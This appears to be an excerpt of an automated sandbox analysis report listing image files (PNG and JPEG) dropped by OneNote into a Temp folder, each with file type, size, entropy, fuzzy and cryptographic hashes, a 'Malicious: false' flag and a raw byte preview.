C:\Users\user\AppData\Local\Temp\{47C0B329-6385-48C8-8B36-2B8DD169752A}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{4A177920-B6CC-4EFC-AE5B-105EB872AE34}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

C:\Users\user\AppData\Local\Temp\{4DFB07BF-B1BC-4B08-A921-80CCF154DC5A}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{4ECB337B-30CA-433B-B193-E6410944FEB7}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12180
Entropy (8bit):	5.318266117301791
Encrypted:	false
SSDEEP:	96:k1bHyG/fKOOOOQJUg+g2S+kEm6alfsfsfn32:+bSG/yOOOOQ+g+gOab32
MD5:	5C859FF69B3A271A9AAB08DFA21E8894
SHA1:	3156302A7450ADFF4D1B6EC893E955D3764D4DD4
SHA-256:	B4A8E9A67EE0B897615AC4CCE388FFC175AB92D9E192E6875C79A4E7C1B5BB6E
SHA-512:	4CF518136EEBCA4F400A115D9B7BB0CAC9FA650BF910B99E15F04A259B7D3EFCFFD6796886FE09DB08C37C332B14BC8500845C09C8EAE1F2306F90E98D3C99E0
Malicious:	false
Preview:	.PNG........IHDR..............;j.....sRGB.........pHYs..........+..../9IDATx^...dW...S=.dL$.............-.`...'...x.7.D...(...$.?cO....9S]=.v...Z.......{..wNuf.&.....a.k5~...._..\.yk..v.....}{._.Q...5...._9o.n.....}7.].1v..t......q....3.<..0<.p.......0....s...... @....... @....... @....... @....... @...X.'..U-..... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%@....... @....... @....... @....... @....... @....../)m.. @....... @....... @....... @....... @....... @ ....`.)....... @....... @....... @....... @....... @....K.0.....J....... @....... @....... @....... @....... @...`.....\.... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%

C:\Users\user\AppData\Local\Temp\{4F4C04ED-A391-4759-AD79-B28E4C8413DC}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	109698
Entropy (8bit):	7.954100577911302
Encrypted:	false
SSDEEP:	3072:rDlmvIWr0aRtNCfShCWBxyCHMlcVG0Ezy4FR:rDliIfot8ahCWBcCHDVwR
MD5:	8D804A60E86627383BED6280ED62F1CF
SHA1:	E23FF14B10AD0762DD67FBA3CD6EFC85647C0384
SHA-256:	494547E566FB7A63DD429EB0699FE41AA8998F8EA2F758D813FE3D56C3075719
SHA-512:	0FB19F3D00159F2748C3A54E952E551B9FEA6910D67A54DECA8D099992E50383EADB92768FF1F75CFFAE82A7A157B1E0F77A2F0BE7EC64FD2324304FDCA46577
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...............................................................................................!"#.123..AQB$..aq.RCS...b..c4%..rs..D&....5E6'..TdUte...u.....FV...7.......................!"..1A2B..QaqR.#.br3.........C%...$5.....c4U..Eeu&SsD.6T..................?.....O.C.....^..R<A.g...[....3.....r.0.....nX.S....}...[.?Z.....A.?..~~I..rY\|N.o...9......!...o7r../-.y...'5.3.U.s".-.0.1......SS...&.Q.j.*.$m.e..:x....`}...EP.?.7..~G(so.......O.....z.N..<....~^a.e...........p9.?<._..\|......~.<@.D.9..G..?.?z.y?z.C.U.w..[.,..A.+........s......g...G.^....pz.xY.....d8.y.X...P..O(A.O..~:._.......<...o..4s..^.^b..x......_a.....\|{c...:..X.....}.._...[?..NK.c...}.<......H.G....+x.Z..\|....n...o....`.nk.#.%x......-\|...\|7......N!=././..w.8x.".8....'x........w...,>....j[w8a..}..lS..?.

C:\Users\user\AppData\Local\Temp\{4FC7B2DD-3053-4C91-997B-368635273EAC}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	4410
Entropy (8bit):	7.857636973514526
Encrypted:	false
SSDEEP:	96:E/pQuIhKZ7u06dICH3AroiTe8DGTl55poBUmLNjpH7MvDHjfm:MpdZtPbknnRPpkLNVMvu
MD5:	2494381A1ACDC83843B912CFCDE5643B
SHA1:	98F9D1CC140076D1AE5A9EA19F47658FD5DF0D66
SHA-256:	5EEBE803E434A845D19BC600DF3C75E98BB69BD0DE473CEEC410D1B3A9154E28
SHA-512:	0E64CC3723DC41D94910F7ADFB6A0DFB5049350FD15A873695614E4A89ABD78B166BA4E9C8CB95E275FB56981539DECD2A7F28FBC25E80DD5E2DEA8077CC9489
Malicious:	false
Preview:	.PNG........IHDR...2...X.......E.....PLTE...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B..(....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.].\TU.?3"...(..L........q.Q...H.*j......W..Xd.ie.f..%.XT...em..m.m.vkik...>.}..}\|..{'.U..~......}....s.............,CVu.x.:C..5...;.

C:\Users\user\AppData\Local\Temp\{50DE8ED1-C2C9-4BBB-85BB-EBFF9E89E720}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{510A4DC9-7ABE-48E9-B2BA-040F3AA1731D}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2332
Entropy (8bit):	7.8822150338370776
Encrypted:	false
SSDEEP:	48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
MD5:	91CB7F1273AA003076401081B8A22237
SHA1:	5157144069E7D2FDAE60B397BE5851E75BDF7707
SHA-256:	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
SHA-512:	5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
Malicious:	false
Preview:	.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r\|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..\|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

C:\Users\user\AppData\Local\Temp\{539EC58A-C820-44FE-9F86-F429E1C21580}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	17289
Entropy (8bit):	7.962998633267186
Encrypted:	false
SSDEEP:	384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
MD5:	708E8EB906BC105CCA0535AE669AA651
SHA1:	38D82DEDFE97D3001188C2E18FE13BD741FD520F
SHA-256:	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
SHA-512:	1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }...B@....i<8.....B@.T2 .........xp..! .....d@...!......(B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'\|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

C:\Users\user\AppData\Local\Temp\{56064A89-E73B-493C-9749-C22BEBBA8117}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11332
Entropy (8bit):	7.9324721568775285
Encrypted:	false
SSDEEP:	192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
MD5:	31579CA3352DF8FA4E3E7F48C7CDF672
SHA1:	AA682A3C781BF8EE43B5EDC9718E64CB79135F25
SHA-256:	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
SHA-512:	782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b. &M.d-e... ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...\|....7...b...\|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..\|..[..g%(h.....W...?...UDh..T$..?....\|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,\|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?\|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

C:\Users\user\AppData\Local\Temp\{562C0DCE-101E-4020-AD50-8B63921265F5}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13737
Entropy (8bit):	7.916899917415529
Encrypted:	false
SSDEEP:	384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
MD5:	830632032C7DDBCCDE126F4BAE935540
SHA1:	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
SHA-256:	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
SHA-512:	5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
Malicious:	false
Preview:	.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

C:\Users\user\AppData\Local\Temp\{56900BFA-6009-403D-A883-F9B0E22A686F}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 39 x 579, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	515
Entropy (8bit):	6.740133870626016
Encrypted:	false
SSDEEP:	12:6v/7su2/c30mqkg9VgFHe7Ll8UmJX/N+1Zmkk8f3lbtI4:4mc38gFHe18lkk8f3lbth
MD5:	E96BE30D892A5412CF262FEE652921CA
SHA1:	8190A0BFE21D04BC6F3A406E91B87CA69C03A2DE
SHA-256:	0E31DA4DFCFF4A36C64C1CE940362D2309769F36369E4C43C317D5F2FA15658E
SHA-512:	D647F51ABBD013226A6ADD0D551D058C633F867F9AF5A9E099B85D6E291D220F7B85958B07381CD4C7C4F72356DBAFE2A86932AE398E28C56CDDF0744E92EE24
Malicious:	false
Preview:	.PNG........IHDR...'...C........b...`PLTE..................................................................................................bKGD....H....cmPPJCmp0712....H.s....9IDATx^..I..@.C..<..?mo.#C((.J}...~..B...b.I.i.\<.e.....(p.I.EO...q.x.......dRz....K..b0.:.<c.o..0.x\:...F....I&..ap....."P@....DO...q)p*..@Y.CL2)=......1.........4....._.G..^`..lDO...q...X....SL..z....K..#.L#..I6..ap.Ls.,....7&..ap.p..lI...,GO...q.....k.n1..4......3=.f.x.$..4.....o....x.$+..0.x\.,&6...............IEND.B`.

C:\Users\user\AppData\Local\Temp\{57082D53-4D11-477E-8A8C-084FF145AF14}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{5710AA08-644D-4CBD-ADFE-E7D2FF7A89F3}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	7.836744258175623
Encrypted:	false
SSDEEP:	24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
MD5:	B1FDE66F75507567B5F0C6C07B01A3A1
SHA1:	80B8E6A923E853232F66C874367E90B5C9CAD7AE
SHA-256:	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
SHA-512:	FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
Malicious:	false
Preview:	.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M..J.....".4....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o\|.?.......;C\|.#.../v.H.......o~.{G......H.\|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P\|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O\|.D...

C:\Users\user\AppData\Local\Temp\{576827F1-B240-43BC-8FF2-CDAF09142C92}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	95763
Entropy (8bit):	7.931689087616878
Encrypted:	false
SSDEEP:	1536:EoES7mhTyzabUaE77xAOmq0zVruQlttNxlipxVWssMU2YhRy2v6pKKYhQzwMc2:zz7mhTyzabUa4b4xuQlttnlGx8x9h02M
MD5:	177DD42CA99CAA2CCBF2974221680334
SHA1:	35FD86B3DD082A6D4930C67BC0E05D3B5817465A
SHA-256:	525A857D0EDA855A64D3619DF58B1C2D013A73E60FA0D49B155ECFCB2C134C7C
SHA-512:	6FB6D9A6C97B1115C3246690A2F339CD612899AC25ACBA00296EAEAA0A1D094E7339D670969764FE23EB7C08FCDD01C6F78FBC0735D504D5E02AD342901719B3
Malicious:	false
